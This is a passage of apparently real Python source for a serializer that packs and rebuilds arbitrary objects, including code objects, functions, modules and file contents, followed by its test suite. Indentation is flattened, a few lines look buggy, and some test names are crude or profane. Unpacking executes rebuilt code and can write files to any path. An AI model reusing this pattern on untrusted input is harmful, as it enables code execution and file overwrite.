old_init, new_init = type.__init__, lambda self: None,
type.__init__ = new_init
result = type()
type.__init__ = old_init
#result.__name__ = name
return result
@classmethod
def p_instance(cls, object, **attributes):
c = type_
result = [(c.id, c.p_instance(object, **attributes))]
for t in type_.subclasses(builtins.type(object)):
try:
c = package.cache.byclass(t)
except KeyError:
continue
result.append( (c.id, c.p_instance(object, **attributes)) )
return result
@classmethod
def u_instance(cls, instance, data, **attributes):
if len(data) == 0:
return instance
for id, data in data:
c = package.cache.byid(id)
instance = c.u_instance(instance, data, **attributes)
return instance
@package.cache.register
class module_local(__constant):
'''module that is locally stored in the filesystem'''
@classmethod
def getclass(cls):
return module.getclass()
@classmethod
def p_constructor(cls, object, **attributes):
return object.__name__
@classmethod
def u_constructor(cls, data, **attributes):
name = data
return module.instancelocal(name)
@package.cache.register_type
class module_(module_local):
'''a module and it's attributes in memory'''
@classmethod
def p_constructor(cls, object, **attributes):
if sys.version_info.major < 3:
return '', object.__name__, object.__doc__
spec = object.__spec__
return spec.name if isinstance(spec.loader, __import__('_frozen_importlib').BuiltinImporter) else '', object.__name__, object.__doc__
@classmethod
def u_constructor(cls, data, **attributes):
spec, name, doc = data
if sys.version_info.major < 3 or not spec:
return cls.new(name, doc)
res = __import__('spec')
res.__name__, res.__doc__ = name, doc
return res
@classmethod
def p_instance(cls, object, **attributes):
if sys.version_info.major >= 3 and hasattr(object, '__spec__') and isinstance(object.__spec__.loader, __import__('_frozen_importlib').BuiltinImporter):
return {}
ignored = ('__builtins__', '__loader__')
return {k : v for k, v in object.__dict__.items() if k not in ignored}
@classmethod
def u_instance(cls, instance, data, **attributes):
for attribute, value in data.items():
setattr(instance, attribute, value)
return instance
if sys.version_info.major >= 3:
@package.cache.register_const
class ModuleSpec(__constant):
@classmethod
def getclass(cls):
return __import__('_frozen_importlib').ModuleSpec
@package.cache.register_type
class ModuleSpec_(__type__):
@classmethod
def getclass(cls):
return __import__('_frozen_importlib').ModuleSpec
@classmethod
def p_constructor(cls, object, **attributes):
#return object.name, object.loader, object.origin, object.loader_state, hasattr(object, '__path__')
return object.name, None, object.origin, object.loader_state, hasattr(object, '__path__')
@classmethod
def u_constructor(cls, data, **attributes):
cons = cls.getclass()
name, loader, origin, loader_state, is_package = data
#return cons(name, loader, parent=parent, origin=origin, loader_state=loader_state, is_package=is_package)
return cons(name, None, origin=origin, loader_state=loader_state, is_package=is_package)
@classmethod
def p_instance(cls, object, **attributes):
return object.submodule_search_locations
@classmethod
def u_instance(cls, instance, data, **attributes):
instance.submodule_search_locations = data
return instance
if 'builtin':
class __builtin(__type__):
@classmethod
def p_constructor(cls, object, **attributes):
return object
@classmethod
def u_constructor(cls, data, **attributes):
return cls.new(data)
@classmethod
def p_instance(cls, object, **attributes):
return ()
@classmethod
def new(cls, *args, **kwds):
return cls.getclass()(*args, **kwds)
@package.cache.register_type
class bool_(__builtin):
'''standard boolean type'''
@classmethod
def getclass(cls):
return bool.getclass()
@package.cache.register_type
class int_(__builtin):
'''integral value'''
@classmethod
def getclass(cls):
return int.getclass()
@package.cache.register_type
class float_(__builtin):
'''float value'''
@classmethod
def getclass(cls):
return float.getclass()
if sys.version_info.major < 3:
@package.cache.register_type
class long_(__builtin):
'''long value'''
@classmethod
def getclass(cls):
return long.getclass()
@package.cache.register_type
class complex_(__builtin):
'''complex value'''
@classmethod
def getclass(cls):
return complex.getclass()
## sequence types
@package.cache.register_type
class str_(__builtin):
'''str value'''
@classmethod
def getclass(cls):
return str.getclass()
if sys.version_info.major < 3:
@package.cache.register_type
class unicode_(__builtin):
'''unicode string'''
@classmethod
def getclass(cls):
return unicode.getclass()
@package.cache.register_type
class buffer_(__builtin):
'''string buffer'''
@classmethod
def getclass(cls):
return buffer.getclass()
else:
@package.cache.register_type
class bytes_(__builtin):
'''unicode string'''
@classmethod
def getclass(cls):
return bytes.getclass()
if 'immutable':
@package.cache.register_type
class tuple_(__type__):
'''an immutable tuple'''
@classmethod
def getclass(cls):
return tuple.getclass()
@classmethod
def p_constructor(cls, object, **attributes):
return object
@classmethod
def u_constructor(cls, data, **attributes):
return ().__class__(data)
@classmethod
def p_instance(cls, object, **attributes):
'''return attributes of type that will be used to update'''
return ()
@classmethod
def u_instance(cls, instance, data, **attributes):
return instance
if 'mutable':
class __mutable(__type__):
@classmethod
def p_constructor(cls, object, **attributes):
return ()
@classmethod
def u_constructor(cls, data, **attributes):
return cls.new(data)
@classmethod
def new(cls, *args, **kwds):
return cls.getclass()(*args, **kwds)
@package.cache.register_type
class list_(__mutable):
'''a list'''
@classmethod
def getclass(cls):
return list.getclass()
@classmethod
def p_instance(cls, object, **attributes):
'''return attributes of type that will be used to update'''
return ().__class__(object)
@classmethod
def u_instance(cls, instance, data, **attributes):
'''update the object with the provided data'''
instance[:] = data
return instance
@package.cache.register_type
class dict_(__mutable):
'''a dictionary'''
@classmethod
def getclass(cls):
return dict.getclass()
@classmethod
def p_instance(cls, object, **attributes):
'''return attributes of type that will be used to update'''
return object
@classmethod
def u_instance(cls, instance, data, **attributes):
'''update the object with the provided data'''
instance.clear()
instance.update(data)
return instance
@package.cache.register_type
class set_(__mutable):
'''a set'''
@classmethod
def getclass(cls):
return set.getclass()
@classmethod
def p_instance(cls, object, **attributes):
'''return attributes of type that will be used to update'''
return ().__class__(object)
@classmethod
def u_instance(cls, instance, data, **attributes):
instance.clear()
instance.update(data)
return instance
@package.cache.register_type
class frozenset_(__mutable):
'''a frozenset'''
@classmethod
def getclass(cls):
return frozenset.getclass()
@classmethod
def p_instance(cls, object, **attributes):
'''return attributes of type that will be used to update'''
return ().__class__(object)
if 'special':
class __special(__type__):
attributes = None
@classmethod
def getclass(cls):
raise NotImplementedError(cls)
@classmethod
def p_constructor(cls, object, **attributes):
result = {}
if cls.attributes.__class__ == {}.__class__:
result.update((k, getattr(object, k, cls.attributes[k])) for k in cls.attributes)
else:
result.update((k, getattr(object, k)) for k in cls.attributes)
return result
@classmethod
def p_instance(cls, object, **attributes):
return ()
@package.cache.register_type
class instancemethod_(__special):
'''a python class method'''
attributes = ['im_func', 'im_self', 'im_class']
@classmethod
def getclass(cls):
return instancemethod.getclass()
@classmethod
def u_constructor(cls, data, **attributes):
return cls.new(data['im_func'], data['im_self'], data['im_class'])
@package.cache.register_type
class property_(__special):
'''a python class property'''
attributes = ['fdel', 'fset', 'fget']
@classmethod
def getclass(cls):
return property.getclass()
@classmethod
def u_constructor(cls, data, **attributes):
return property.new(fget=data['fget'], fset=data['fset'], fdel=data['fdel'])
@package.cache.register_type
class code_(__special):
'''a python code type'''
if sys.version_info.major < 3:
attributes = [
'co_argcount', 'co_nlocals', 'co_stacksize', 'co_flags', 'co_code',
'co_consts', 'co_names', 'co_varnames', 'co_filename', 'co_name',
'co_firstlineno', 'co_lnotab', 'co_freevars', 'co_cellvars'
]
else:
attributes = [
'co_argcount', 'co_posonlyargcount', 'co_kwonlyargcount', 'co_nlocals', 'co_stacksize',
'co_flags', 'co_code', 'co_consts', 'co_names', 'co_varnames',
'co_filename', 'co_name', 'co_firstlineno', 'co_lnotab',
'co_freevars', 'co_cellvars'
]
@classmethod
def getclass(cls):
return code.getclass()
@classmethod
def u_constructor(cls, data, **attributes):
result = (data[k] for k in cls.attributes)
return code.new(*result)
@package.cache.register_type
class function_(__type__):
'''a python function'''
@classmethod
def getclass(cls):
return function.getclass()
# FIXME: having to include the globals for an unbound function (__module__ is undefined) might be weird
@classmethod
def p_constructor(cls, object, **attributes):
# so...it turns out that only the closure property is immutable
res = object.func_closure if sys.version_info.major < 3 else object.__closure__
func_closure = () if res is None else res
func_code = object.func_code if sys.version_info.major < 3 else object.__code__
if object.__module__ is None:
raise AssertionError('FIXME: Unable to pack an unbound function')
return object.__module__, func_code, ().__class__(cell.cell_contents for cell in func_closure)
@classmethod
def u_constructor(cls, data, **attributes):
# modulename, code, closure, globals = data
modulename, code, closure = data
if object.__module__ is None:
raise AssertionError('FIXME: Unable to unpack an unbound function')
# XXX: assign the globals from hints if requested
globs = attributes['globals'] if 'globals' in attributes else module.instance(modulename).__dict__
result = cls.cell(*closure)
return function.new(code, globs, closure=result)
@classmethod
def p_instance(cls, object, **attributes):
if sys.version_info.major < 3:
return object.func_code, object.func_name, object.func_defaults
return object.__code__, object.__name__, object.__defaults__
@classmethod
def u_instance(cls, instance, data, **attributes):
instance.func_code, instance.func_name, instance.func_defaults = data
return instance
@classmethod
def cell(cls, *args):
'''Convert args into a cell tuple'''
if sys.version_info.major < 3:
return ().__class__(((lambda item: lambda : item)(item).func_closure[0]) for item in args)
return ().__class__(((lambda item: lambda : item)(item).__closure__[0]) for item in args)
@package.cache.register
class builtin_(__constant):
'''copy from local module and name'''
@classmethod
def getclass(cls):
return builtin.getclass()
@classmethod
def p_constructor(cls, object, **attributes):
return (object.__module__, object.__name__)
@classmethod
def u_constructor(cls, data, **attributes):
mod, name = data
m = module.instancelocal(mod)
return getattr(m, name)
if sys.version_info.major < 3:
@package.cache.register
class file_(__constant):
'''A file..for serializing the contents of the file look at file_contents'''
@classmethod
def getclass(cls):
return file.getclass()
@classmethod
def p_constructor(cls, file, **attributes):
offset = file.tell()
return file.name, file.mode, offset
@classmethod
def u_constructor(cls, data, **attributes):
name, mode, offset = data
file = open(name, mode)
file.seek(offset)
return file
@package.cache.register
class file_contents(file_):
# FIXME: save the whole file.. (should be selected via a hint)
@classmethod
def getclass(cls):
return file.getclass()
@classmethod
def p_constructor(cls, file, **attributes):
offset = file.tell()
file.seek(0)
content = file.read()
file.seek(offset)
return (file.name, file.mode, offset, content)
@classmethod
def u_constructor(cls, data, **attributes):
name, mode, offset, content = data
file = open(name, "w")
file.write(content)
file.close()
file = open(name, mode)
file.seek(offset)
return file
import _weakref
@package.cache.register_type
class weakref_(__type__):
@classmethod
def getclass(cls):
return _weakref.ReferenceType
@classmethod
def p_constructor(cls, object, **attributes):
return (object(),)
@classmethod
def u_constructor(cls, data, **attributes):
object, = data
class extref(_weakref.ref):
def __new__(self, object):
self.__cycle__ = object
return _weakref.ref(object)
# return super(extref, self)(object)
return extref(object)
@classmethod
def p_instance(cls, object, **attributes):
return ()
@package.cache.register_type
class super_(__type__):
@classmethod
def getclass(cls):
return builtins.super
@classmethod
def p_constructor(cls, object, **attributes):
return (object.__thisclass__, object.__self__)
@classmethod
def u_constructor(cls, data, **attributes):
thisclass, self = data
return builtins.super(thisclass, self)
@classmethod
def p_instance(cls, object, **attributes):
return ()
import _thread
@package.cache.register_type
class threadlock_(__type__):
@classmethod
def getclass(cls):
return _thread.LockType # XXX
@classmethod
def p_constructor(cls, object, **attributes):
return ()
@classmethod
def u_constructor(cls, data, **attributes):
return _thread.allocate_lock()
@classmethod
def p_instance(cls, object, **attributes):
return ()
# XXX: the following aren't completed...maybe never will be
@package.cache.register_type
class generator_(__type__):
@classmethod
def getclass(cls):
return generator.getclass()
@classmethod
def p_constructor(cls, object, **attributes):
raise NotImplementedError('Unable to pack objects of type generator_') # Due to the gi_frame property
return object.gi_running, object.gi_code, object.gi_frame
@classmethod
def u_constructor(cls, data, **attributes):
co, fr = data
result = function.new(co, fr.f_globals)
raise NotImplementedError('Unable to unpack objects of type generator_')
return result
@classmethod
def p_instance(cls, object, **attributes):
return ()
@classmethod
def u_instance(cls, instance, data, **attributes):
return instance
@package.cache.register_type
class frame_(incomplete): # FIXME: can't construct these, we can create a shell object for these tho maybe
attributes = ['f_back', 'f_builtins', 'f_code', 'f_exc_traceback', 'f_exc_type', 'f_exc_value', 'f_globals', 'f_lasti', 'f_lineno', 'f_locals', 'f_restricted', 'f_trace']
@classmethod
def getclass(cls):
return frame.getclass()
@classmethod
def p_constructor(cls, object, **attributes):
raise NotImplementedError('Unable to pack objects of type frame_')
@classmethod
def u_constructor(cls, data, **attributes):
raise NotImplementedError('Unable to unpack objects of type frame_')
@package.cache.register_type
class staticmethod_(__constant):
@classmethod
def getclass(cls):
return Staticmethod.getclass()
@classmethod
def p_constructor(cls, object, **attributes):
return object.__func__,
@classmethod
def u_constructor(cls, data, **attributes):
fn, = data
return cls.new(fn)
@package.cache.register_type
class classmethod_(__constant):
@classmethod
def getclass(cls):
return Classmethod.getclass()
@classmethod
def p_constructor(cls, object, **attributes):
return object.__func__,
@classmethod
def u_constructor(cls, data, **attributes):
fn, = data
return cls.new(fn)
import re, _sre
@package.cache.register_type
class re_pattern(__constant):
@classmethod
def getclass(cls):
res = _sre.compile('', 0, [1], 0, {}, ())
return res.__class__
@classmethod
def p_constructor(cls, object, **attributes):
return object.pattern, object.flags
@classmethod
def u_constructor(cls, data, **attributes):
pattern, flags = data
return re._compile(pattern, flags)
if 'operator':
import functools, operator
class __operator_reduceable(__constant):
@classmethod
def p_constructor(cls, object, **attributes):
return object.__reduce__()
@classmethod
def u_constructor(cls, data, **attributes):
t, parameters = data
return t(*parameters)
@package.cache.register_const
class partial(__constant):
@classmethod
def getclass(cls):
return functools.partial
@package.cache.register_type
class partial_(__operator_reduceable):
@classmethod
def getclass(cls):
return functools.partial
@classmethod
def p_constructor(cls, object, **attributes):
t = object.__class__
return t, (object.func, object.args, object.keywords)
@classmethod
def u_constructor(cls, data, **attributes):
t, (f, args, kwargs) = data
return t(f, *args, **kwargs)
@package.cache.register_const
class attrgetter(__constant):
@classmethod
def getclass(cls):
return operator.attrgetter
@package.cache.register_type
class attrgetter_(__operator_reduceable):
@classmethod
def getclass(cls):
return operator.attrgetter
# Python2 methodology for determining which attributes
# of a class are being touched by an operator.
@classmethod
def attribute_collector(cls, append):
def closure(self, name, append=append):
items = [name]
append(items)
return cls.attribute_collector(items.append)
class dummy(object): pass
dummy.__getattribute__ = closure
return dummy()
@classmethod
def attribute_flatten(cls, items):
def collect(item):
if len(item) > 1:
head, tail = item[0], collect(item[1])
return [head] + tail
return item
return [collect(item) for item in items]
# Python2 methodology of figuring out the attributes
def __p_constructor_v2(cls, object, **attributes):
t, state = cls.getclass(), []
dummy = cls.attribute_collector(state.append)
object(dummy)
attribs = cls.attribute_flatten(state)
return t, ().__class__('.'.join(item) for item in attribs)
def __p_constructor_v3(cls, object, **attributes):
return object.__reduce__()
p_constructor = classmethod(__p_constructor_v2 if sys.version_info.major < 3 else __p_constructor_v3)
@package.cache.register_const
class itemgetter(__constant):
@classmethod
def getclass(cls):
return operator.itemgetter
@package.cache.register_type
class itemgetter_(__operator_reduceable):
@classmethod
def getclass(cls):
return operator.itemgetter
# Python2 methodology for determining which items
# of an object are being fetched by an operator.
@classmethod
def item_collector(cls, append):
def closure(self, item, append=append):
append(item)
return None
class dummy(object): pass
dummy.__getitem__ = closure
return dummy()
# Python2 methodology of figuring out the items
def __p_constructor_v2(cls, object, **attributes):
t, state = cls.getclass(), []
dummy = cls.item_collector(state.append)
object(dummy)
return t, ().__class__(item for item in state)
def __p_constructor_v3(cls, object, **attributes):
return object.__reduce__()
p_constructor = classmethod(__p_constructor_v2 if sys.version_info.major < 3 else __p_constructor_v3)
@package.cache.register_const
class methodcaller(__constant):
@classmethod
def getclass(cls):
return operator.methodcaller
@package.cache.register_type
class methodcaller_(__operator_reduceable):
@classmethod
def getclass(cls):
return operator.methodcaller
# Python2 methodology for determining which attributes
# of a class will be called by an operator
@classmethod
def method_collector(cls, append):
def preserve(state):
def call(*args, **kwargs):
state.append((args, kwargs))
return call
def closure(self, name, callable=preserve, append=append):
item = [name]
append(item)
return callable(item)
class dummy(object): pass
dummy.__getattribute__ = closure
return dummy()
# Python2 methodology of figuring out the attributes
def __p_constructor_v2(cls, object, **attributes):
t, state = cls.getclass(), []
dummy = cls.method_collector(state.append)
object(dummy)
f, (args, keywords) = state[0]
fargs = (f,) + args
return t, (fargs, keywords)
def __p_constructor_v3(cls, object, **attributes):
partial, args = object.__reduce__()
if partial is cls.getclass():
return partial, (args, {})
return partial.func, (partial.args + args, partial.keywords)
p_constructor = classmethod(__p_constructor_v2 if sys.version_info.major < 3 else __p_constructor_v3)
@classmethod
def u_constructor(cls, data, **attributes):
t, (args, keywords) = data
return t(*args, **keywords)
## regular functions
#import cPickle as pickle
import marshal as pickle
def dumps(object, **attributes):
'''Convert any python object into a string.'''
return pickle.dumps(package.pack(object, **attributes))
def loads(data, **attributes):
'''Convert a string back into a python object.'''
return package.unpack(pickle.loads(data), **attributes)
def pack(object, **attributes):
'''Serialize an instance of a python object into a tuple'''
return package.pack(object, **attributes)
def unpack(data, **attributes):
'''Deserialize a tuple back into an instance'''
return package.unpack(data, **attributes)
import sys
def caller(frame=None):
"""Return the (module, name) of the requested frame.
This will default to the calling function if a frame is not supplied.
"""
import sys
fr = sys._getframe().f_back if frame is None else frame
source, name = fr.f_code.co_filename, fr.f_code.co_name
module = [x for x in sys.modules.values() if hasattr(x, '__file__') and (x.__file__.endswith(source) or x.__file__.endswith('%sc'%source))]
module, = (None,) if not module else module
return module, name
if __name__ == '__main__':
import traceback
class Result(Exception): pass
class Success(Result): pass
class Failure(Result): pass
Werror = True
TestCaseList = []
def TestCase(fn):
def harness(**kwds):
name = fn.__name__
try:
res = fn(**kwds)
raise Failure
except Success as E:
print('%s: %r'% (name, E))
return True
except Failure as E:
print('%s: %r'% (name, E))
except Exception as E:
print('%s: %r : %r'% (name, Failure(), E))
#print(traceback.format_exc())
return False
TestCaseList.append(harness)
return fn
if __name__ == '__main__':
from builtins import *
import builtins, fu
# lame helpers for testcases
def make_package(cls, cons, inst):
m, n = '__main__', 'unnamed'
result = (fu.VERSION, 0, ({0:(cls.id, cons)}, {0:(cls.id, inst)}))
# result = (fu.VERSION, 0, ({0:(cls.id, (m, n), cons)}, {0:(cls.id, inst)}))
return result
def extract_package(package):
_, id, (cons, inst) = package
return id, cons, inst
def check_package(package):
ver, id, (cons, inst) = package
if {item for item in cons.keys()} != {item for item in inst.keys()}:
return False
if ver != fu.VERSION:
return False
return id in cons
class A(object):
pass
class B(A):
def method(self):
return 'B'
class C1(B):
def method_c1(self):
return 'C1'
class C2(B):
def method_c2(self):
return 'C2'
class D(C1, C2):
def method_c1(self):
return 'D'
if __name__ == '__main__':
@TestCase
def test_pack_type():
input = True
result = fu.package.pack(input)
if check_package(result):
raise Success
@TestCase
def test_builtin_pack():
input = 0x40
result = fu.package.pack(input)
id, cons, inst = extract_package(result)
if cons[id][-1] == input:
raise Success
@TestCase
def test_builtin_unpack():
input = make_package(fu.bool_, True, ())
result = fu.package.unpack(input)
if result == True:
raise Success
@TestCase
def test_constant_unpack():
input = make_package(fu.none, (), ())
result = fu.package.unpack(input)
if result == None:
raise Success
@TestCase
def test_list_pack():
l = [item for item in range(5)]
result = fu.package.pack(l)
id, cons, inst = extract_package(result)
if check_package(result) and len(cons) == len(l) + 1:
raise Success
@TestCase
def test_listref_pack():
a = [item for item in range(5)]
l = 4 * [a]
result = fu.package.pack(l)
id, cons, inst = extract_package(result)
_, items = inst[id]
if check_package(result) and len(cons) == len(inst) == len(a) + 1 + 1 and len({item for item in items}) == 1:
raise Success
@TestCase
def test_listrecurse_pack():
a = []
a.append(a)
result = fu.package.pack(a)
id, cons, inst = extract_package(result)
if inst[id][1][0] == id:
raise Success
@TestCase
def test_dict_pack():
l = {'hello': 'world', 5: 10, True: False}
result = fu.package.pack(l)
id, cons, inst = extract_package(result)
if check_package(result) and len(inst) == len(cons) == 2 * len(l) + 1:
raise Success
@TestCase
def test_dictref_pack():
a = [item for item in range(5)]
l = {'hello': a, 'world': a}
result = fu.package.pack(l)
id, cons, inst = extract_package(result)
if check_package(result) and len(cons) == len(inst) == len(a) + 1 + len(l) + 1:
raise Success
@TestCase
def test_dictrecurse_pack():
a = {}
a[5] = a
result = fu.package.pack(a)
id, cons, inst = extract_package(result)
if check_package(result) and [item for item in inst[id][1].values()][0] == id:
raise Success
@TestCase
def test_listref_unpack():
a = [5]
a.append(a)
data = fu.package.pack(a)
y = fu.package.unpack(data)
if y[1][1][0] == 5:
raise Success
@TestCase
def test_dictref_unpack():
a = {}
a[5] = None
a[6] = a
data = fu.package.pack(a)
y = fu.package.unpack(data)
if y[6][5] is None:
raise Success
def test_code_packunpack_v2():
def func(*args):
return ' '.join(args)
a = fu.package.pack(func.func_code)
b = fu.package.unpack(a)
if func.func_code.co_name == b.co_name and func.func_code is not b:
raise Success
def test_code_packunpack_v3():
def func(*args):
return ' '.join(args)
a = fu.package.pack(func.__code__)
b = fu.package.unpack(a)
if func.__code__.co_name == b.co_name and func.__code__ is not b:
raise Success
test_code_packunpack = TestCase(test_code_packunpack_v2 if sys.version_info.major < 3 else test_code_packunpack_v3)
@TestCase
def test_func_packunpack():
def func(*args):
return ' '.join(args)
a = fu.package.pack(func)
b = fu.package.unpack(a)
if func is not b and b('hello', 'world') == 'hello world':
raise Success
@TestCase
def test_type_packunpack():
class blah(object):
def func(self, *args):
return ' '.join(args)
a = fu.package.pack(blah)
b = fu.package.unpack(a)
b = b()
if b.func('hello', 'world') == 'hello world':
raise Success
@TestCase
def test_instance_packunpack():
class blah(object):
def func(self, *args):
return ' '.join(args)
a = fu.package.pack(blah())
b = fu.package.unpack(a)
if b.func('hello', 'world') == 'hello world':
raise Success
@TestCase
def test_typevalue_packunpack():
class blah(object):
junk = 'whee'
a = fu.package.pack(blah)
b = fu.package.unpack(a)
if b.junk == 'whee':
raise Success
@TestCase
def test_instancevalue_packunpack():
class blah(object):
junk = 'whee'
a = fu.package.pack(blah())
b = fu.package.unpack(a)
if b.junk == 'whee':
raise Success
@TestCase
def test_class_packunpack():
p = fu.package.pack(A)
result = fu.package.unpack(p)
if result.__name__ == 'A':
raise Success
@TestCase
def test_multiclass_packunpack():
p = fu.package.pack(B)
result = fu.package.unpack(p)
if result().method() == 'B':
raise Success
@TestCase
def test_derived_packunpack():
p = fu.package.pack(C1)
result = fu.package.unpack(p)
if result().method() == 'B':
raise Success
@TestCase
def test_multiclass_packunpack():
p = fu.package.pack(C1)
result = fu.package.unpack(p)
if result().method_c1() == 'C1' and result().method() == 'B':
raise Success
@TestCase
def test_multiinheritance_packunpack():
p = fu.package.pack(D)
result = fu.package.unpack(p)
if result().method_c1() == 'D' and result().method_c2() == 'C2':
raise Success
@TestCase
def test_python_gay():
class test(object):
def fiver(self):
return 5
class test2(test):
def tenor(self):
return 10
a = test2()
identity = id(a.tenor) == id(a.fiver)
if identity is not True:
raise AssertionError('yay, your python isn\'t lying about id being unique')
if a.tenor() != a.fiver():
raise Success
@TestCase
def test_func_closure():
def fn(a1, a2):
def closure(a3):
return (a1+a2)*a3
return closure
a = fn(1, 2)
b = fu.package.pack(a)
c = fu.package.unpack(b)
if a(222) == int(c('6')):
raise Success
# @TestCase # FIXME
def test_unknown_type():
# error while serializing a 'TypeInfo' object which comes from a module implemented in C
# if we can
import xml.dom.minidom
a = fu.package.pack(xml.dom.minidom)
b = fu.package.unpack(a)
@TestCase
def test_inheritance_native():
class blah([].__class__): pass
x = blah()
x.append(5)
a = fu.package.pack(x)
b = fu.package.unpack(a)
if len(x) == len(b):
raise Success
@TestCase
def test_const_list():
t = type([])
a = fu.package.pack(t)
b = fu.package.unpack(a)
if b is t:
raise Success
@TestCase
def test_type_intbool():
v = 1
a = fu.package.pack(v)
b = fu.package.unpack(a)
if b == v and type(b) == type(v):
raise Success
@TestCase
def test_module_builtin():
import sys
a = fu.pack(sys)
b = fu.unpack(a)
if b is sys:
raise Success
@TestCase
def test_module_general():
import re
a = re.compile('fuckyou', 0)
b = fu.pack(a)
c = fu.unpack(b)
if id(b) != id(c) if sys.version_info.major < 3 else c is not a:
raise Success
# @TestCase
def test_module():
import fu
a = fu.package.pack(fu)
b = fu.package.unpack(a)
if b.VERSION == fu.VERSION and b is not fu:
raise Success
# @TestCase
def test_ignore_modulepack():
import sys
a = fu.package.pack(sys, local=('sys',))
_, x, y = a
if y[0][x][0] is not fu.module.id:
raise Failure
b = fu.package.unpack(a)
if sys.winver is b.winver:
raise Success
# @TestCase
def test_ignore_moduleunpack():
import _ast as testpackage
a = fu.package.pack(testpackage)
_, x, y = a
if y[0][x][0] is not fu.module_.id:
raise Failure
b = fu.package.unpack(a, local=('_ast',))
if b is testpackage:
raise Success
#@TestCase
def test_ptype_pack():
from ptypes import pint
a = pint.uint32_t()
a.setoffset(id(builtins.type))
result = a.l.value
b = fu.package.unpack(fu.package.pack(a))
if b.value == result:
raise Success
#@TestCase
def test_continuation_yield():
def fn():
yield 1
yield 2
global a, b, c
a = fn()
if a.next() != 1:
raise AssertionError
b = fu.package.pack(a)
c = fu.package.unpack(b)
if c.next() == 2:
raise Success
@TestCase
def test_weakref_packunpack():
import fu, _weakref
a = set(('hello', ))
b = _weakref.ref(a)
c = fu.pack(b)
d = fu.unpack(c)
if list(b()) == list(d()):
raise Success
@TestCase
def test_super_packunpack():
import fu
class blah({item for item in []}.__class__):
def huh(self):
return 5
class blahsub(blah):
def huh(self):
return super(blahsub, self)
# FIXME: this is busted in python2
a = blahsub((20, 40, 60))
b = a.huh()
c = fu.pack(b)
d = fu.unpack(c)
if d.huh() == b.huh():
raise Success
@TestCase
def test_threadlock_packunpack():
import _thread, fu
a = _thread.allocate_lock()
b = fu.pack(a)
c = fu.unpack(b)
if a.__class__ == c.__class__:
raise Success
@TestCase
def test_object_instance_packunpack():
import fu
a = object()
b = fu.pack(a)
c = fu.unpack(b)
if type(a) == type(c) and isinstance(c, type(a)):
raise Success
@TestCase
def test_instancevalue_slots_packunpack():
import fu
class mytype(object):
__slots__ = ['blargh', 'huh']
readonly = 20
#blargh = 500
#huh = 20
a = mytype()
b = fu.unpack(fu.pack(a))
try:
b.blargh = 500
b.huh = 500
except AttributeError:
raise Failure("Unable to assign to slots")
try:
b.readonly = 20
raise Failure("Successfully assigned to a readonly property")
except AttributeError:
pass
try:
b.nope = None
raise Failure("Assigned a property to a __dict__ instead of an allocated slot")
except AttributeError:
pass
if b.blargh == b.huh == 500 and b.readonly == 20:
raise Success
@TestCase
def test_operator_partial():
def fucker(x, y, z):
return x * y + z
f = functools.partial(fucker, 2, 3)
g = fu.unpack(fu.pack(f))
if f(1) == g(1):
raise Success
@TestCase
def test_operator_attrgetter_0():
class t(object):
mine = 5
f = operator.attrgetter('mine')
g = fu.unpack(fu.pack(f))
if f(t) == g(t):
raise Success
@TestCase
def test_operator_attrgetter_1():
f = operator.attrgetter('mine', 'two')
result = fu.package.pack(f)
id, cons, inst = extract_package(result)
_, items = cons[id]
_, args = [cons[id] for id in items][-1]
parameters = [cons[id] for id in args]
attributes = [name for _, name in parameters]
if attributes == ['mine', 'two']:
raise Success
@TestCase
def test_operator_attrgetter_2():
f = operator.attrgetter('this.is.a.deep', 'one.and.this.one.too')
result = fu.package.pack(f)
id, cons, inst = extract_package(result)
_, items = cons[id]
_, args = [cons[id] for id in items][-1]
parameters = [cons[id] for id in args]
attributes = [name for _, name in parameters]
if attributes == ['this.is.a.deep', 'one.and.this.one.too']:
raise Success
@TestCase
def test_operator_itemgetter_0():
x = {'mine': 5}
f = operator.itemgetter('mine')
g = fu.unpack(fu.pack(f))
if f(x) == g(x):
raise Success
@TestCase
def test_operator_itemgetter_1():
f = operator.itemgetter('mine', 'two')
result = fu.package.pack(f)
id, cons, inst = extract_package(result)
_, items = cons[id]
_, args = [cons[id] for id in items][-1]
parameters = [cons[id] for id in args]
attributes = [name for _, name in parameters]
if attributes == ['mine', 'two']:
raise Success
@TestCase
def test_operator_methodcaller_0():
class t(object):
@classmethod
def mine(cls, x):
return 2 * x
f = operator.methodcaller('mine', 3)
g = fu.unpack(fu.pack(f))
if f(t) == g(t):
raise Success
@TestCase
def test_operator_methodcaller_1():
class t(object):
@classmethod
def mine(cls, x):
return 2 * x
f = operator.methodcaller('mine', x=3)
g = fu.unpack(fu.pack(f))
if f(t) == g(t):
raise Success
@TestCase
def test_operator_methodcaller_2():
class t(object):
@classmethod
def mine(cls, x, **kwargs):
return 2 * x + kwargs.get('y')
f = operator.methodcaller('mine', 3, y=20)
g = fu.unpack(fu.pack(f))
if f(t) == g(t):
raise Success
@TestCase
def test_operator_methodcaller_3():
class t(object):
@classmethod
def mine(cls, x, **kwargs):
return 2 * x + kwargs.get('y')
f = operator.methodcaller('mine', x=3, y=20)
g = fu.unpack(fu.pack(f))
if f(t) == g(t):
raise Success
@TestCase
def test_operator_methodcaller_classmethod_0():
class t1(object):
def mine(self, x, y):
return 2 * x + y
class t2(object):
def mine(self, x, y):
return i1.mine(x, y)
i1, i2 = t1(), t2()
f = operator.methodcaller('mine', 20, 5)
g = fu.unpack(fu.pack(f))
if f(i1) == g(i2):
raise Success
@TestCase
def test_operator_methodcaller_classmethod_1():
class t1(object):
def mine(self, x, y):
return 2 * x + y
class t2(object):
def mine(self, x, y):
return i1.mine(x, y)
i1, i2 = t1(), t2()
f = operator.methodcaller('mine', 20, y=5)
g = fu.unpack(fu.pack(f))
if f(i1) == g(i2):
raise Success
@TestCase
def test_operator_methodcaller_classmethod_2():
class t1(object):
def mine(self, x, y):
return 2 * x + y
class t2(object):
def mine(self, x, y):
return i1.mine(x, y)
i1, i2 = t1(), t2()
f = operator.methodcaller('mine', x=20, y=5)
g = fu.unpack(fu.pack(f))
if f(i1) == g(i2):
raise Success
if __name__ == '__main__':
results = []
for t in TestCaseList:
results.append( t() )
if __name__ == 'bootstrap':
import importlib, fu
from fu import package
## figure out which type methods we need
st = package.stash()
n = st.store(package)
t1 = set()
t1.update(n for n, _ in st.cons_data.values())
t1.update(n for n, _ in st.inst_data.values())
print(len(t1))
[st.store(fu.package.cache.byid(n)) for n in t]
t2 = set()
t2.update(n for n, _ in st.cons_data.values())
t2.update(n for n, _ in st.inst_data.values())
print(len(t2))
print(sum(map(len, (fu.package.cache.registration.id, fu.package.cache.registration.type, fu.package.cache.registration.const))))
t = t2
mymethod = type(fu.function.new)
